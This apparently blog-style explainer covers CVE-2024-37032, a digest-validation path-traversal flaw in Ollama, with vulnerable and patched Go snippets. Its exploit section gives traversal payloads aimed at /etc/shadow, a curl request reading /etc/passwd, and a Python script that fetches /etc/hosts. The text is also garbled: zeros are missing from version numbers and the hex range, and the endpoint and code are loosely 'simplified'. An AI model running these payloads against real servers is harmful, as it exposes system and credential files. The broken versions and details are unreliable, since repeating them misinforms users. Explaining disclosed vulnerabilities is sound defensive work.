In June 2024, a significant vulnerability surfaced in Ollama, a popular open-source framework for running large language models locally. Identified as CVE-2024-37032, this bug affects Ollama versions before .1.34 and relates to improper validation of SHA-256 digest formats in handling model blobs. This post goes deep into the vulnerability, its impact, and how attackers could exploit this issue with code examples and resources for further study.

What Is Ollama?

Ollama is designed to make running LLMs, like Llama and Mistral, on local machines simple and efficient. It manages downloads and storage of model weights using a digest (essentially, a unique fingerprint) which should always be a 64-character hexadecimal string derived from SHA-256.

What Happened?

When Ollama retrieves a model blob, it expects a digest in the form of a sha256: prefix followed by 64 hexadecimal characters. Due to a validation bug in affected versions, Ollama did not strictly check:

Any extra or missing characters

- Malicious substrings like ../, which can lead to directory traversal

As a result, invalid or even malicious digest inputs were not rejected, which could have significant consequences for security.

Reference

- Ollama Changelog mentioning the fix (v.1.34)
- NVD Entry for CVE-2024-37032

Why Does It Matter?

When software interacts with files based on user-supplied input, failing to validate that input can open doors to:

- Directory Traversal Attacks – Attackers can access files outside of intended directories (../ can mean "go up a directory")

Unexpected Behavior or Crashes

In Ollama's context, it means someone could craft requests with bad digests and potentially read or write data they shouldn't be able to touch.

Exploiting the Bug — How Could an Attacker Abuse CVE-2024-37032?

Let’s walk through how this might look in practice.

Here’s a simplified version of how the vulnerable function would process requests

// Vulnerable snippet from Ollama (before .1.34)
func getBlobsPath(digest string) (string, error) {
    // No proper validation!
    return filepath.Join(blobsDir, digest), nil
}

This code concatenates blobsDir with *whatever* string is supplied by the user (the digest). If the digest is "../secrets/passwords.txt", Ollama would happily return the path outside its intended directory!

Exploit Examples

#### 1. Using Too Short/Long Digests

If a user sends a short or long digest

sha256:123      (only 3 hex digits, should be 64)
sha256:abcdef... (more than 64 hex digits)

Ollama lets it through. This can be used to confuse file lookup logic or force collisions.

The dangerous one. If a user sends

sha256:../../../../etc/shadow

The function would return

/var/lib/ollama/blobs/sha256:../../../../etc/shadow

And if subsequent code doesn't check or sanitize, it could open or manipulate system files!

Here’s a basic HTTP call you might use to exploit the bug (using curl)

curl http://localhost:11434/v1/models/blobs/sha256:../../../../etc/passwd

Or – in pseudocode for a malicious script

import requests

digest = "sha256:../../../../etc/hosts"

# Example endpoint (adjust as Ollama's API changes)
url = f"http://localhost:11434/v1/models/blobs/{digest}";

resp = requests.get(url)

if resp.status_code == 200:
    print("Directory Traversal Succeeded!")
    print(resp.text)
else:
    print("Failed or Fix Applied.")

If the server returns sensitive file content, the server is vulnerable!

How Was It Fixed?

After security researchers and users noticed the issue (including failing test cases like TestGetBlobsPath), Ollama maintainers patched the bug by strictly validating the digest format:

The hexadecimal portion must be exactly 64 characters

- Only -9 and a-f allowed (no ../ or other invalid input)

A simplified fixed function might look like

func getBlobsPath(digest string) (string, error) {
    if !strings.HasPrefix(digest, "sha256:") {
        return "", errors.New("invalid digest prefix")
    }
    hexPart := digest[len("sha256:"):]
    if len(hexPart) != 64 || !isHex(hexPart) {
        return "", errors.New("invalid digest format")
    }
    // Safe to use now!
    return filepath.Join(blobsDir, digest), nil
}

- Official Ollama Repository
- v.1.34 Patch Release
- CVE-2024-37032 on NVD
- Ollama Issue Tracker

Conclusion

CVE-2024-37032 is a classic reminder: always validate user input, especially when constructing file paths or handling anything that touches the filesystem. Ollama’s quick fix helps secure one of the fastest-growing local AI infrastructure tools. Keeping up-to-date and security-aware is essential as open source AI projects grow in popularity.

Stay safe, and always check those digests!

*This analysis is crafted to help users and developers understand CVE-2024-37032 in Ollama in plain, straightforward terms. If you spot similar weaknesses in other projects, report them responsibly!*

Timeline

Published on: 05/31/2024 04:15:09 UTC
Last modified on: 03/27/2025 21:15:49 UTC